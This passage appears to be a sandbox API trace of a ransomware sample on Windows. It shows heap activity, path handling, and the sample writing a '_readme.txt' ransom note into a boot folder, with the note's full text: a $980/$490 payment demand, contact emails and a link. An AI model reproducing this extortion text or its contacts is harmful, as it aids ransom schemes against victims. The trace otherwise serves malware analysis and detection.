HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.277] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0179.277] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.278] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.278] PathFindFileNameW (pszPath="") returned="" [0179.278] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.278] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.278] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.278] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.279] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0179.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.279] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0179.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.280] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.280] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.280] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.282] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*" (normalized: "c:\\boot\\nb-no\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.282] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.282] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.283] PathFindExtensionW 